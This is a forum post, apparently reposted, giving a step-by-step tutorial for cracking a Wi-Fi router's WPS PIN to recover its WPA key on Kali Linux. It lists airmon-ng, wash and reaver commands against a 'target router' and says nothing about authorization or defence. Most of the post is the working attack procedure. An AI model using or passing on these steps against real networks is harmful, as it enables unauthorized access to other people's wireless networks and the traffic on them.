Originally posted by Lwja
*NOTE THE FOLLOWING*:
YOU WILL NEED LINUX, I USE KALI, WHICH ALREADY HAS EVERYTHING INSTALLED
YOU NEED AN ADAPTER THAT SUPPORTS INJECTION(I use the Alfa 036H)
WPS MUST BE ENABLE ON YOUR TARGET ROUTER OR THIS METHOD WILL NOT WORK!
------------------------------------------------------------------------------------------------------
1.
Open Command prompt and type in the following command:
CODE:
"ifconfig"
This will show us every single wireless adapter that is connected to the system. In this case it shows me that my adapters name is "wlan4"
------------------------------------------------------------------------------------------------------
2.
Type the following command:
CODE:
airmon-ng start wlan4
Replace wlan4 with the name of your adapter. This sets the card into monitor mode. Your adapter name should now be different, in my case it will be named "mon0"
------------------------------------------------------------------------------------------------------
3.
Type the following command:
CODE:
wash -i mon0
This displays every network that has WPS enabled. If you see a network on this list you can continue, if not you would want to stop right now and try a different method(I may post some later on.) Please copy the bssid as you will need it for step 4.
------------------------------------------------------------------------------------------------------
4.
Type the following command and replace the bssid with your own (as well as the adapter name, but it should be mon0 for most cases):
CODE:
reaver -b 00:C0:CA:6B:B7:06 -i mon0 -vv
After you click Enter it will start cracking. Depending on how far you are from the network will determine the cracking speed. Once its cracked you will see the WPA pin or what-not in clear text.